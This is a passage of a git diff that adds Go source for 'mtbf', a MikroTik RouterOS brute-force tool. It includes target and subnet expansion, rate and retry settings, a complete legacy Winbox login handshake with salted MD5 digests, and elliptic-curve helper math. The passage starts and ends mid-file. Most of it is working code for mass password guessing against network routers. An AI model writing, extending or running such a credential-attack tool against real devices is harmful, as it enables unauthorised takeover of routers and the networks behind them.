+// then, if nothing is found, a normal list is searched, +// and (TODO) if this list is empty or will soon be emptied, +// a new batch of endpoints gets created. +func FetchEndpoint() (e *Endpoint, waitTime time.Duration) { + endpointMutex.Lock() + defer endpointMutex.Unlock() + + e, waitTime = GetDelayedEndpoint() + if e != nil { + log("ep", 4, "fetched a delayed endpoint: \"%v\"", e) + return e, 0 + } + + el := endpoints.Front() + if el == nil { + if waitTime == 0 { + log("ep", 1, "out of endpoints") + return nil, 0 + } + + log("ep", 4, "all endpoints are delayed, waiting for %v", waitTime) + return nil, waitTime + } + + endpoints.MoveToBack(el) + e = el.Value.(*Endpoint) + + log("ep", 4, "fetched an endpoint: \"%v\"", e) + return e, 0 +} + +// Safety feature, to avoid expanding subnets into a huge amount of IPs. +const maxNetmaskSize = 22 // expands into /10 for IPv4 + +// RegisterEndpoint builds an Endpoint and puts it to a global list of endpoints. +func RegisterEndpoint(ip string, ports []int, isIPv6 bool) int { + for _, port := range ports { + ep := Endpoint{addr: Address{ip: ip, port: port, v6: isIPv6}} + ep.loginPos.Reset() + ep.passwordPos.Reset() + + ep.listElement = endpoints.PushBack(&ep) + log("ep", 3, "ok registered: %v", &ep) + } + + return len(ports) +} + +func incIP(ip net.IP) { + for j := len(ip) - 1; j >= 0; j-- { + ip[j]++ + if ip[j] > 0 { + break + } + } +} + +func parseCIDR(ip string, ports []int, isIPv6 bool) int { + na, nm, err := net.ParseCIDR(ip) + if err != nil { + log("ep", 0, "failed to parse CIDR notation for \"%v\": %v", ip, err.Error()) + return 0 + } + + mask, maskBits := nm.Mask.Size() + if mask < maskBits-maxNetmaskSize { + log("ep", 0, "ignoring out of safe bounds CIDR netmask for \"%v\": %v (max: %v, allowed: %v)", ip, mask, maskBits, maxNetmaskSize) + return 0 + } + + curHost := 0 + maxHost := 1<<(maskBits-mask) - 1 + numParsed := 0 + strict := CfgGetSwitch("strict-subnets") + + log("ep", 2, "expanding CIDR: \"%v\" to %v hosts", ip, maxHost+1) + + for expIP := na.Mask(nm.Mask); nm.Contains(expIP); incIP(expIP) { + if strict && (curHost == 0 || curHost == maxHost) && maskBits-mask >= 2 { + log("ep", 1, "ignoring network/broadcast address due to strict-subnets: \"%v\"", expIP.String()) + } else { + numParsed += parseIPPorts(expIP.String(), ports, isIPv6) + } + curHost++ + } + + return numParsed +} + +func parseIPPorts(ip string, ports []int, isIPv6 bool) int { + // ip may be a domain name, a CIDR subnet or an IP address + // CIDR subnets must be expanded to plain IPs + + if strings.LastIndex(ip, "/") >= 0 { // this is a CIDR subnet + return parseCIDR(ip, ports, isIPv6) + } else if strings.Count(ip, "/") > 1 { // invalid CIDR notation + log("ep", 0, "invalid CIDR subnet format: \"%v\", ignoring", ip) + return 0 + } else { // otherwise, just register + return RegisterEndpoint(ip, ports, isIPv6) + } +} + +func extractIPAndPort(str string, skippedIPv6 *int) (ip string, port int, err error) { + var portString string + ip, portString, err = net.SplitHostPort(str) + if err != nil { + return "", 0, err + } + + port, err = strconv.Atoi(portString) + if err != nil { + return "", 0, err + } + + if port <= 0 || port > 65535 { + return "", 0, errors.New("invalid port: " + strconv.Itoa(port)) + } + + return ip, port, nil +} + +func ParseEndpoints(source []string) { + log("ep", 1, "parsing endpoints") + totalIPv6Skipped := 0 + numParsed := 0 + + for _, str := range source { + if !strings.Contains(str, ":") { + // no ":": this is an ipv4/dn without port, + // parse it with all known ports + + numParsed += parseIPPorts(str, CfgGetIntSlice("port"), false) + } else { + // either ipv4/dn with port, or ipv6 with/without port + + isIPv6 := strings.Count(str, ":") > 1 + if isIPv6 && CfgGetSwitch("no-ipv6") { + log("ep", 1, "skipping ipv6 target \"%v\" due to no-ipv6", str) + totalIPv6Skipped++ + continue + } + + if !strings.Contains(str, "]:") && strings.Contains(str, "::") { + // ipv6 without port + numParsed += parseIPPorts(str, CfgGetIntSlice("port"), true) + continue + } + + ip, port, err := extractIPAndPort(str, &totalIPv6Skipped) + if err != nil { + log("ep", 0, "failed to extract ip/port for \"%v\": %v", str, err.Error()) + continue + } + + ports := []int{port} + // append all default ports + if CfgGetSwitch("append-default-ports") { + for _, port2 := range CfgGetIntSlice("port") { + if port != port2 { + ports = append(ports, port2) + } + } + } + + numParsed += parseIPPorts(ip, ports, isIPv6) + } + } + + logIf(totalIPv6Skipped > 0, "ep", 0, "skipping %v IPv6 targets due to no-ipv6 flag", totalIPv6Skipped) + log("ep", 1, "finished parsing endpoints: got %v, total %v", numParsed, endpoints.Len()) +} + +func init() { + endpoints = list.New() + delayedEndpoints = list.New() + + CfgRegister("port", []int{8291}, "one or more default ports") + CfgRegister("max-aps", 5, "maximum number of attempts per second for an endpoint") + CfgRegisterSwitch("no-ipv6", "skip IPv6 entries") + CfgRegisterSwitch("append-default-ports", "always append default ports even for targets in host:port format") + CfgRegisterSwitch("strict-subnets", "strict subnet behaviour: ignore network and broadcast addresses in /30 and bigger subnets") + + CfgRegisterSwitch("keep-endpoint-on-good", "keep processing endpoint if a login/password was found") + + CfgRegister("conn-ratio", 0.15, "keep a failed endpoint if its bad/good connection ratio is lower than this value") + CfgRegister("max-bad-after-good-conn", 5, "how many consecutive bad connections to allow after a good connection") + CfgRegister("max-bad-conn", 20, "always remove endpoint after this many consecutive bad connections") + CfgRegister("min-bad-conn", 2, "do not consider removing an endpoint if it does not have this many consecutive bad connections") + + CfgRegister("proto-error-ratio", 0.25, "keep endpoints with a protocol error if their protocol error ratio is lower than this value") + CfgRegister("max-proto-errors", 20, "always remove endpoint after this many consecutive protocol errors") + CfgRegister("min-proto-errors", 4, "do not consider removing an endpoint if it does not have this many consecutive protocol errors") + + CfgRegister("read-error-ratio", 0.25, "keep endpoints with a read error if their read error ratio is lower than this value") + CfgRegister("max-read-errors", 20, "always remove endpoint after this many consecutive read errors") + CfgRegister("min-read-errors", 3, "do not consider removing an endpoint if it does not have this many consecutive read errors") + + CfgRegister("no-response-delay-ms", 2000, "wait for this number of ms if an endpoint does not respond") + CfgRegister("read-error-delay-ms", 5000, "wait for this number of ms if an endpoint returns a read error") + CfgRegister("protocol-error-delay-ms", 5000, "wait for this number of ms if an endpoint returns a protocol error") + +} diff --git a/go.mod b/go.mod new file mode 100644 index 0000000..9d22a28 --- /dev/null +++ b/go.mod @@ -0,0 +1,5 @@ +module mtbf + +go 1.18 + +require github.com/emirpasic/gods v1.18.1 diff --git a/go.sum b/go.sum new file mode 100644 index 0000000..b5ad666 --- /dev/null +++ b/go.sum @@ -0,0 +1,2 @@ +github.com/emirpasic/gods v1.18.1 h1:FXtiHYKDGKCW2KzwZKx0iC0PQmdlorYgdFG9jPXJ1Bc= +github.com/emirpasic/gods v1.18.1/go.mod h1:8tpGGwCnJ5H4r6BWwaV6OrWmMoPhUl5jm/FMNAnJvWQ= diff --git a/legacy-winbox.go b/legacy-winbox.go new file mode 100644 index 0000000..d11c6e7 --- /dev/null +++ b/legacy-winbox.go @@ -0,0 +1,439 @@ +package main + +import ( + "bytes" + "crypto/md5" + "encoding/binary" + "errors" + "fmt" + "io" + "strconv" +) + +const MT_BOOL_FALSE byte = 0x00 +const MT_BOOL_TRUE byte = 0x01 +const MT_DWORD byte = 0x08 +const MT_BYTE byte = 0x09 +const MT_STRING byte = 0x21 +const MT_HASH byte = 0x31 +const MT_ARRAY byte = 0x88 + +const MT_RECEIVER = 0xFF0001 +const MT_SENDER = 0xFF0002 +const MT_REPLY_EXPECTED = 0xFF0005 +const MT_REQUEST_ID = 0xFF0006 +const MT_COMMAND = 0xFF0007 + +type M2Element struct { + code int + value interface{} +} + +func (el *M2Element) String() string { + return fmt.Sprintf("code=%v,type=%T,value=%v", el.code, el.value, el.value) +} + + +type M2Message struct { + el []M2Element +} + +type M2Hash string + +func NewM2Message() *M2Message { + m2 := M2Message{} + return &m2 +} + +func (m2 *M2Message) Clear() { + m2.el = []M2Element{} +} + +func (m2 *M2Message) Append(code int, value interface{}) { + if m2.el == nil { + m2.Clear() + } + m2.el = append(m2.el, M2Element{code: code, value: value}) +} + +func (m2 *M2Message) AppendElement(el *M2Element) { + if m2.el == nil { + m2.Clear() + } + m2.el = append(m2.el, *el) +} + +func (m2 *M2Message) Bytes() []byte { + res := []byte{} + + for _, el := range m2.el { + buf := new(bytes.Buffer) + + binary.Write(buf, binary.LittleEndian, uint16(el.code)) + binary.Write(buf, binary.LittleEndian, byte(el.code >> 16)) + + switch v := el.value.(type) { + case bool: + binary.Write(buf, binary.LittleEndian, v) + case byte: + binary.Write(buf, binary.LittleEndian, byte(MT_BYTE)) + binary.Write(buf, binary.LittleEndian, v) + case int: + binary.Write(buf, binary.LittleEndian, byte(MT_DWORD)) + binary.Write(buf, binary.LittleEndian, int32(v)) + case uint: + binary.Write(buf, binary.LittleEndian, byte(MT_DWORD)) + binary.Write(buf, binary.LittleEndian, uint32(v)) + case string: + binary.Write(buf, binary.LittleEndian, byte(MT_STRING)) + binary.Write(buf, binary.LittleEndian, byte(len(v))) + binary.Write(buf, binary.LittleEndian, []byte(v)) + case M2Hash: + binary.Write(buf, binary.LittleEndian, byte(MT_HASH)) + binary.Write(buf, binary.LittleEndian, byte(len(v))) + binary.Write(buf, binary.LittleEndian, []byte(v)) + case []byte: + binary.Write(buf, binary.LittleEndian, byte(MT_ARRAY)) + binary.Write(buf, binary.LittleEndian, uint16(len(v))) + for _, i := range v { + binary.Write(buf, binary.LittleEndian, int32(i)) + } + case []int: + binary.Write(buf, binary.LittleEndian, byte(MT_ARRAY)) + binary.Write(buf, binary.LittleEndian, uint16(len(v))) + for _, i := range v { + binary.Write(buf, binary.LittleEndian, int32(i)) + } + } + + res = append(res, buf.Bytes()...) + } + + header := make([]byte, 6) + header[0] = byte(len(res) + 4) + header[1] = 0x01 + header[2] = 0x00 + header[3] = byte(len(res) + 2) + header[4] = 0x4D + header[5] = 0x32 + + return append(header, res...) +} + + +func (m2 *M2Message) ParseM2Element(buf io.Reader) error { + var codeAndType uint32 + err := binary.Read(buf, binary.LittleEndian, &codeAndType) + if err != nil { + return err + } + + el := M2Element{code: int(codeAndType & 0x00FFFFFF)} + keyType := byte(codeAndType >> 24) + log("lw", 3, "m2 code=%v type=%v", el.code, keyType) + + switch keyType { + case MT_BOOL_FALSE, MT_BOOL_TRUE: + el.value = keyType == MT_BOOL_TRUE + log("lw", 3, "m2 MT_BOOL: %v", el.value.(bool)) + case MT_BYTE: + var b byte + err = binary.Read(buf, binary.LittleEndian, &b) + el.value = b + log("lw", 3, "m2 MT_BYTE: %v", el.value.(byte)) + case MT_DWORD: + var b int32 + err = binary.Read(buf, binary.LittleEndian, &b) + el.value = b + log("lw", 3, "m2 MT_DWORD: %v", el.value.(int32)) + + case MT_STRING: + var length byte + err = binary.Read(buf, binary.LittleEndian, &length) + if err != nil { + return err + } + + bs := make([]byte, length) + _, err = io.ReadFull(buf, bs) + el.value = string(bs) + log("lw", 3, "m2 MT_STRING (len %v): %v", length, el.value.(string)) + + case MT_HASH: + var length byte + err = binary.Read(buf, binary.LittleEndian, &length) + if err != nil { + return err + } + + bs := make([]byte, length) + _, err = io.ReadFull(buf, bs) + el.value = M2Hash(bs) + log("lw", 3, "m2 MT_HASH (len %v): %v", length, []byte(el.value.(M2Hash))) + + case MT_ARRAY: + var length uint16 + err = binary.Read(buf, binary.LittleEndian, &length) + if err != nil { + return err + } + + sl := []int{} + for i := 0; i < int(length); i++ { + var el2 int32 + err = binary.Read(buf, binary.LittleEndian, &el2) + if err != nil { + break + } + sl = append(sl, int(el2)) + } + el.value = sl + log("lw", 3, "m2 MT_HASH (len %v): %v", length, el.value.([]int)) + + default: + return errors.New("unknown key code " + strconv.Itoa(int(keyType))) + } + + if err != nil { + return err + } + + m2.el = append(m2.el, el) + return nil +} + +func (m2 *M2Message) ParseM2Message(buf io.Reader) error { + var headerBlockSize, m2BlockSize byte + var m2Extra, m2Header uint16 + err := binary.Read(buf, binary.LittleEndian, &headerBlockSize) + err = binary.Read(buf, binary.LittleEndian, &m2Extra) + err = binary.Read(buf, binary.LittleEndian, &m2BlockSize) + err = binary.Read(buf, binary.LittleEndian, &m2Header) + if err != nil { + return err + } + if m2Extra != 0x1 { + return errors.New("invalid M2_EXTRA") + } + if m2Header != 0x324D { + return errors.New("invalid M2_HEADER") + } + + for { + log("lw", 3, "parsing new m2 element") + err := m2.ParseM2Element(buf) + if err != nil { + return err + } + } +} + +func ParseM2Messages(src []byte) (messages []M2Message, err error) { + messages = []M2Message{} + buf := bytes.NewReader(src) + + for { + m2 := NewM2Message() + err := m2.ParseM2Message(buf) + + if err == io.EOF { + messages = append(messages, *m2) + break + } else if err != nil { + return nil, err + } else { + messages = append(messages, *m2) + } + } + + + log("lw", 3, "m2 eof after %v messages", len(messages)) + return messages, nil +} + + + + + + + + + + +type LegacyWinbox struct { + task *Task + stage int + m2 []M2Message +} + +func NewLegacyWinbox(task *Task) *LegacyWinbox { + lw := LegacyWinbox{task: task, stage: -1, m2: []M2Message{}} + return &lw +} + + +// req1 +func (lw *LegacyWinbox) MTReqList() []byte { + m2 := NewM2Message() + m2.Append(MT_RECEIVER, []byte{2, 2}) + m2.Append(MT_COMMAND, byte(7)) + m2.Append(MT_REQUEST_ID, byte(1)) + m2.Append(MT_REPLY_EXPECTED, true) + m2.Append(1, "list") + return m2.Bytes() +} + +// res1 +func (lw *LegacyWinbox) MTGetSid(m2 []M2Message) *M2Element { + for _, msg := range m2 { + for _, el := range msg.el { + if el.code == 0xFE0001 { + return &el + } + } + } + + return nil +} + + +// req2 +func (lw *LegacyWinbox) MTReqChallenge(sid *M2Element) []byte { + m2 := NewM2Message() + m2.Append(MT_RECEIVER, []byte{13, 4}) + m2.Append(MT_COMMAND, byte(4)) + m2.Append(MT_REQUEST_ID, byte(2)) + m2.AppendElement(sid) + m2.Append(MT_REPLY_EXPECTED, true) + return m2.Bytes() +} + +// res2 +func (lw *LegacyWinbox) MTGetSalt(m2 []M2Message) M2Hash { + for _, msg := range m2 { + for _, el := range msg.el { + if el.code == 0x9 { + return el.value.(M2Hash) + } + } + } + + return "" +} + + +// req3 +func (lw *LegacyWinbox) MTReqAuth(sid *M2Element, login, digest, salt string) []byte { + m2 := NewM2Message() + m2.Append(MT_RECEIVER, []byte{13, 4}) + m2.Append(MT_COMMAND, byte(1)) + m2.Append(MT_REQUEST_ID, byte(3)) + m2.AppendElement(sid) + m2.Append(MT_REPLY_EXPECTED, true) + m2.Append(1, login) + m2.Append(9, M2Hash(salt)) + m2.Append(10, M2Hash(digest)) + return m2.Bytes() +} + +// res3 +func (lw *LegacyWinbox) MTGetResult(m2 []M2Message) (res bool, err error) { + for _, msg := range m2 { + for _, el := range msg.el { + if el.code == 0xA { + _, ok := el.value.(M2Hash) + if ok { + return true, nil + } + } else if el.code == 0xFF0008 { + v, ok := el.value.(int32) + if ok && v == 0xFE0006 { + return false, nil + } + } + } + } + + return false, errors.New("no auth marker found") +} + + + + +func (lw *LegacyWinbox) SendRecv(buf []byte) (res []byte, err error) { + _, err = lw.task.conn.Write(buf) + if err != nil { + log("lw", 1, "failed to send: %v", err.Error()) + return nil, err + } + + resp := make([]byte, 1024) + n, err := lw.task.conn.Read(resp) + if err != nil { + log("lw", 1, "failed to recv: %v", err.Error()) + return nil, err + } + + return resp[:n], nil +} + + +func (lw *LegacyWinbox) TryLogin() (res bool, err error) { + log("lw", 2, "login: stage 1, req_list") + r1, err := lw.SendRecv(lw.MTReqList()) + if err != nil { + return false, err + } + + log("lw", 2, "login: stage 2, got response for req_list") + msg, err := ParseM2Messages(r1) + if err != nil { + return false, err + } + + sid := lw.MTGetSid(msg) + if sid == nil { + return false, errors.New("failed to get SID from stage 2") + } + log("lw", 2, "login: stage 2, sid %v", sid.String()) + r2, err := lw.SendRecv(lw.MTReqChallenge(sid)) + if err != nil { + return false, err + } + + log("lw", 2, "login: stage 3, got response for req_challenge") + log("lw", 2, "r2: %v", r2) + + msg, err = ParseM2Messages(r2) + if err != nil { + return false, err + } + + salt := lw.MTGetSalt(msg) + if salt == "" { + return false, errors.New("failed to get salt from stage 3") + } + + sl := []byte{0} + sl = append(sl, []byte(lw.task.password)...) + sl = append(sl, []byte(salt)...) + d := md5.Sum(sl) + digest := append([]byte{0}, d[:]...) + + log("lw", 2, "login: stage 3, hash %v", digest) + r3, err := lw.SendRecv(lw.MTReqAuth(sid, lw.task.login, string(digest), string(salt))) + if err != nil { + return false, err + } + + log("lw", 2, "login: stage 4, got response for req_salt") + msg, err = ParseM2Messages(r3) + if err != nil { + return false, err + } + + res, err = lw.MTGetResult(msg) + log("lw", 2, "login: stage 5: res=%v err=%v", res, err) + + return res, err +} diff --git a/log.go b/log.go new file mode 100644 index 0000000..9b3f30a --- /dev/null +++ b/log.go @@ -0,0 +1,91 @@ +package main + +import ( + "fmt" + "os" + "strings" +) + +func shouldLog(facility string, level, maxLevel int) bool { + moduleMap := CfgGet("log-module-map").(map[string]bool) + + logModule, ok := moduleMap[strings.ToLower(facility)] + if ok { + return logModule + } + + if maxLevel < 0 { + return true // log everything if log-level is -1 + } + + return maxLevel >= level +} + +func log(facility string, level int, s string, params ...interface{}) { + maxLevel := CfgGetInt("log-level") + if !shouldLog(facility, level, maxLevel) { + return + } + + var prefix = "" + if level > 0 { + prefix = strings.Repeat("-", level) + "> " + } + if (maxLevel >= 2 || maxLevel < 0) && facility != "" { + prefix = prefix + "[" + strings.ToUpper(facility) + "]: " + } + + if len(params) == 0 { + fmt.Printf(prefix + s + "\n") + } else { + fmt.Printf(prefix+s+"\n", params...) + } +} + +func fail(s string, params ...interface{}) { + if len(params) == 0 { + fmt.Fprintf(os.Stderr, "ERROR: "+s+"\n") + } else { + fmt.Fprintf(os.Stderr, "ERROR: "+s+"\n", params...) + } + os.Exit(1) +} + +func logIf(condition bool, facility string, level int, s string, params ...interface{}) { + if condition { + log(facility, level, s, params...) + } +} + +func failIf(condition bool, s string, params ...interface{}) { + if condition { + fail(s, params...) + } +} + +func updateModuleMap() { + logModules := CfgGet("log-modules").([]string) + noLogModules := CfgGet("no-log-modules").([]string) + + newMap := map[string]bool{} + + for _, module := range logModules { + module = strings.ToLower(module) + newMap[module] = true + } + + for _, module := range noLogModules { + module = strings.ToLower(module) + failIf(newMap[module] == true, "log module \"%v\" is defined both in log-modules and no-log-modules", module) + newMap[module] = false + } + + CfgSet("log-module-map", newMap) +} + +func init() { + CfgRegister("log-level", 0, "max log level, useful for debugging. -1 logs everything") + CfgRegisterCallback("log-modules", []string{}, "always log output from these modules", updateModuleMap) + CfgRegisterCallback("no-log-modules", []string{}, "never log output from these modules", updateModuleMap) + CfgRegisterHidden("log-module-map", map[string]bool{}) +} diff --git a/math.go b/math.go new file mode 100644 index 0000000..c9fb82b --- /dev/null +++ b/math.go @@ -0,0 +1,132 @@ +package main + +import ( + _ "fmt" + "math" +) + +func powInt(x, y int) int { + return int(math.Pow(float64(x), float64(y))) +} + +func egcd(a, b bigint) (g, x, y bigint) { + if a.Empty() { + return b, NewBigint(0), NewBigint(1) + } else { + g, y, x = egcd(b.Mod(a), a) + return g, x.Sub(b.Div(a).Mul(y)), y + } +} + +func modinv(a, p bigint) bigint { + if a.LtInt(0) { + a = a.Mod(p) + } + + g, x, _ := egcd(a, p) + if g.NeInt(1) { + panic("modular inverse does not exist") + } else { + return x.Mod(p) + } +} + +func leftmostBit(x bigint) bigint { + if x.LteInt(0) { + panic("x must be greater than 0") + } + + res := NewBigint(1) + for res.Lte(x) { + res = res.MulInt(2) + } + + return res.DivInt(2) +} + +func naf(mult bigint) []bigint { + ret := make([]bigint, 0) + + for mult.GtInt(0) { + if mult.ModInt(2).GtInt(0) { + nd := mult.ModInt(4) + if nd.GteInt(2) { + nd = nd.SubInt(4) + } + ret = append(ret, nd) + mult = mult.Sub(nd) + } else { + ret = append(ret, NewBigint(0)) + } + + mult = mult.DivInt(2) + } + + return ret +} + +func legendreSymbol(a, p bigint) bigint { + l := a.ModExp(p.SubInt(1).DivInt(2), p) + if l.Eq(p.SubInt(1)) { + return NewBigint(-1) + } else { + return l + } +} + +func primeModSqrt(a, p bigint) (bigint, bigint) { + a = a.Mod(p) + + if a.EqInt(0) { + return NewBigint(0), NewEmptyBigint() + } + + if p.EqInt(2) { + return a, NewEmptyBigint() + } + + if legendreSymbol(a, p).NeInt(1) { + return NewEmptyBigint(), NewEmptyBigint() + } + + if p.ModInt(4).EqInt(3) { + x := a.ModExp(p.AddInt(1).DivInt(4), p) + return x, p.Sub(x) + } + + q, s := p.SubInt(1), 0 + for q.ModInt(2).EqInt(0) { + s++ + q = q.DivInt(2) + } + + z := NewBigint(1) + for legendreSymbol(z, p).NeInt(-1) { + z = z.AddInt(1) + } + + c := z.ModExp(q, p) + x := a.ModExp(q.AddInt(1).DivInt(2), p) + t := a.ModExp(q, p) + m := s + + for t.NeInt(1) { + i, e := 0, NewBigint(2) + if m > 0 { + for i = 1; i < m; i++ { + if t.ModExp(e, p).EqInt(1) { + break + } + e = e.MulInt(2) + } + } + + b := c.ModExp(NewBigint(powInt(2, m-i-1)), p) + x = x.Mul(b).Mod(p) + t = t.Mul(b).Mul(b).Mod(p) + c = b.Mul(b).Mod(p) + m = i + } + + return x, p.Sub(x) +} diff --git a/mtbf.go b/mtbf.go new file mode 100644 index 0000000..55f4ea6 --- /dev/null +++ b/mtbf.go @@ -0,0 +1,16 @@ +package main + +func main() { + log("main", 0, "mtbf: Mikrotik RouterOS bruteforce | v1.0.1") + parseAppConfig() + + OpenOutFile() + defer CloseOutFile() + LoadSources() + defer CloseSources() + + wg := InitializeThreads() + WaitForThreads(wg) + + log("main", 0, "finished") +} diff --git a/point.go b/point.go new file mode 100644 index 0000000..51f46b5 --- /dev/null +++ b/point.go @@ -0,0 +1,384 @@ +package main + +import ( + _ "fmt" +) + +type Point struct { + curve *WCurve + x, y bigint + order bigint +} + +var InfinityPoint *Point = NewInfPoint() + +func NewPoint(curve *WCurve, x, y, order bigint) *Point { + point := Point{} + point.x = x + point.y = y + point.order = order + + /*if curve != nil && !curve.containsPoint(x, y) { + panic("point is not on a curve") + }/* + + /*if curve != nil && curve.h.NeInt(1) && !order.Empty() { + if point.Mul(order).Eq(InfinityPoint) { + panic("point is not a scalar multiple") + } + }*/ + + return &point +} + +func NewInfPoint() *Point { + return NewPoint(nil, NewEmptyBigint(), NewEmptyBigint(), NewEmptyBigint()) +} + +func (self *Point) IsInf() bool { + return self.curve == nil && self.x.Empty() && self.y.Empty() +} + +func (self *Point) Eq(other *Point) bool { + eqCurve := self.curve != nil && other.curve != nil && self.curve.Eq(other.curve) + eqX := !self.x.Empty() && !other.x.Empty() && self.x.Eq(other.x) + eqY := !self.y.Empty() && !other.y.Empty() && self.y.Eq(other.y) + + if self.IsInf() && other.IsInf() { + return true + } + + return eqCurve && eqX && eqY +} + +func (self *Point) Neg() *Point { + return NewPoint(self.curve, self.x, self.curve.p.Sub(self.y), NewEmptyBigint()) +} + +func (self *Point) Add(other *Point) *Point { + if other.Eq(InfinityPoint) { + return self + } + + if self.Eq(InfinityPoint) { + return other + } + + if !self.curve.Eq(other.curve) { + panic("cannot add points on different curves") + } + + if self.x.Eq(other.x) { + if self.y.Add(other.y).Mod(self.curve.p).EqInt(0) { + return NewInfPoint() + } else { + return self.Double() + } + } + + p := self.curve.p + im := modinv(other.x.Sub(self.x), p) + l := other.y.Sub(self.y).Mul(im).Mod(p) + + x3 := l.Mul(l).Sub(self.x).Sub(other.x).Mod(p) + y3 := l.Mul(self.x.Sub(x3)).Sub(self.y).Mod(p) + + return NewPoint(self.curve, x3, y3, NewEmptyBigint()) +} + +func (self *Point) Mul(other bigint) *Point { + e := other + + if e.EqInt(0) || (!self.order.Empty() && e.Mod(self.order).EqInt(0)) { + return NewInfPoint() + } + if self.Eq(InfinityPoint) { + return NewInfPoint() + } + if e.LtInt(0) { + return self.Neg().Mul(e.Neg()) + } + + e3 := e.MulInt(3) + negativeSelf := NewPoint(self.curve, self.x, self.y.Neg(), self.order) + i := leftmostBit(e3).DivInt(2) + res := self + + for i.GtInt(1) { + res = res.Double() + if !e3.And(i).EqInt(0) && e.And(i).EqInt(0) { + res = res.Add(self) + } + if e3.And(i).EqInt(0) && !e.And(i).EqInt(0) { + res = res.Add(negativeSelf) + } + + i = i.DivInt(2) + } + + return res +} + +func (self *Point) Double() *Point { + if self.Eq(InfinityPoint) { + return NewInfPoint() + } + + p := self.curve.p + a := self.curve.a + + im := modinv(self.y.MulInt(2), p) + l := self.x.MulInt(3).Mul(self.x).Add(a).Mul(im).Mod(p) + + x3 := l.Mul(l).Sub(self.x.MulInt(2)).Mod(p) + y3 := l.Mul(self.x.Sub(x3)).Sub(self.y).Mod(p) + + return NewPoint(self.curve, x3, y3, NewEmptyBigint()) +} + +type JacobiPoint struct { + curve *WCurve + x, y, z bigint + order bigint +} + +func NewJacobiPoint(curve *WCurve, x, y, z, order bigint) *JacobiPoint { + // attempt to initialize normal point + NewPoint(curve, x, y, order) + + point := JacobiPoint{} + point.x = x + point.y = y + point.z = z + point.curve = curve + point.order = order + return &point +} + +func NewInfJacobiPoint() *JacobiPoint { + return NewJacobiPoint(nil, NewEmptyBigint(), NewEmptyBigint(), NewEmptyBigint(), NewEmptyBigint()) +} + +func (self *JacobiPoint) IsInf() bool { + return self.curve == nil && self.x.Empty() && self.y.Empty() && self.z.Empty() +} + +func (self *JacobiPoint) EqCoords(x2, y2, z2 bigint) bool { + x1 := self.x + y1 := self.y + z1 := self.z + p := self.curve.p + + zz1 := z1.Mul(z1).Mod(p) + zz2 := z2.Mul(z2).Mod(p) + + m1 := x1.Mul(zz2).Sub(x2.Mul(zz1)).Mod(p) + m2 := y1.Mul(zz2).Mul(z2).Sub(y2.Mul(zz1).Mul(z1)).Mod(p) + + return m1.EqInt(0) && m2.EqInt(0) +} + +func (self *JacobiPoint) EqPoint(other *Point) bool { + if other.IsInf() { + return self.y.Empty() || self.z.Empty() + } + if !self.curve.Eq(other.curve) { + return false + } + + return self.EqCoords(other.x, other.y, NewBigint(1)) +} + +func (self *JacobiPoint) Eq(other *JacobiPoint) bool { + if other.IsInf() { + return self.y.Empty() || self.z.Empty() + } + if !self.curve.Eq(other.curve) { + return false + } + + return self.EqCoords(other.x, other.y, other.z) +} + +func (self *JacobiPoint) Neg() *JacobiPoint { + return NewJacobiPoint(self.curve, self.x, self.y.Neg(), self.z, self.order) +} + +func (self *JacobiPoint) AffineX() bigint { + if self.z.EqInt(1) { + return self.x + } + + z := modinv(self.z, self.curve.p) + return self.x.Mul(z.Mul(z)).Mod(self.curve.p) +} + +func (self *JacobiPoint) AffineY() bigint { + if self.z.EqInt(1) { + return self.y + } + + z := modinv(self.z, self.curve.p) + return self.y.Mul(z.Mul(z).Mul(z)).Mod(self.curve.p) +} + +// modifies in-place +func (self *JacobiPoint) Scale() *JacobiPoint { + if self.z.EqInt(1) { + return self + } + + p := self.curve.p + zInv := modinv(self.z, p) + zzInv := zInv.Mul(zInv).Mod(p) + + x := self.x.Mul(zzInv).Mod(p) + y := self.y.Mul(zzInv).Mul(zInv).Mod(p) + + self.x = x + self.y = y + self.z = NewBigint(1) + return self +} + +func (self *JacobiPoint) ToAffine() *Point { + if self.y.Empty() || self.z.Empty() { + return NewInfPoint() + } + + self.Scale() + return NewPoint(self.curve, self.x, self.y, self.order) +} + +func (self *Point) FromAffine() *JacobiPoint { + return NewJacobiPoint(self.curve, self.x, self.y, NewBigint(1), self.order) +} + +func (self *JacobiPoint) _Double(x1, y1, z1, p, a bigint) (t, y3, z3 bigint) { + if y1.Empty() || z1.Empty() { + return NewBigint(0), NewBigint(0), NewBigint(1) + } + + xx, yy := x1.Mul(x1).Mod(p), y1.Mul(y1).Mod(p) + if yy.Empty() { + return NewBigint(0), NewBigint(0), NewBigint(1) + } + + yyyy := yy.Mul(yy).Mod(p) + zz := z1.Mul(z1).Mod(p) + + s := NewBigint(2).Mul(x1.Add(yy).Mul(x1.Add(yy)).Sub(xx).Sub(yyyy)).Mod(p) + m := NewBigint(3).Mul(xx).Add(a.Mul(zz).Mul(zz)).Mod(p) + t = m.Mul(m).Sub(NewBigint(2).Mul(s)).Mod(p) + y3 = m.Mul(s.Sub(t)).Sub(NewBigint(8).Mul(yyyy)).Mod(p) + z3 = y1.Add(z1).Mul(y1.Add(z1)).Sub(yy).Sub(zz).Mod(p) + + return t, y3, z3 +} + +func (self *JacobiPoint) Double() *JacobiPoint { + if self.y.Empty() { + return NewInfJacobiPoint() + } + + x3, y3, z3 := self._Double(self.x, self.y, self.z, self.curve.p, self.curve.a) + if y3.Empty() || z3.Empty() { + return NewInfJacobiPoint() + } + + return NewJacobiPoint(self.curve, x3, y3, z3, self.order) +} + +func (self *JacobiPoint) _Add(x1, y1, z1, x2, y2, z2, p bigint) (x3, y3, z3 bigint) { + if y1.Empty() || z1.Empty() { + return x2, y2, z2 + } + if y2.Empty() || z2.Empty() { + return x1, y1, z1 + } + + z1z1 := z1.Mul(z1).Mod(p) + z2z2 := z2.Mul(z2).Mod(p) + u1 := x1.Mul(z2z2).Mod(p) + u2 := x2.Mul(z1z1).Mod(p) + s1 := y1.Mul(z2).Mul(z2z2).Mod(p) + s2 := y2.Mul(z1).Mul(z1z1).Mod(p) + h := u2.Sub(u1) + i := NewBigint(4).Mul(h).Mul(h).Mod(p) + j := h.Mul(i).Mod(p) + r := NewBigint(2).Mul(s2.Sub(s1)).Mod(p) + + if h.Empty() && r.Empty() { + return self._Double(x1, y1, z1, p, self.curve.a) + } + + v := u1.Mul(i) + x3 = r.Mul(r).Sub(j).Sub(NewBigint(2).Mul(v)).Mod(p) + y3 = r.Mul(v.Sub(x3)).Sub(NewBigint(2).Mul(s1).Mul(j)).Mod(p) + z3 = 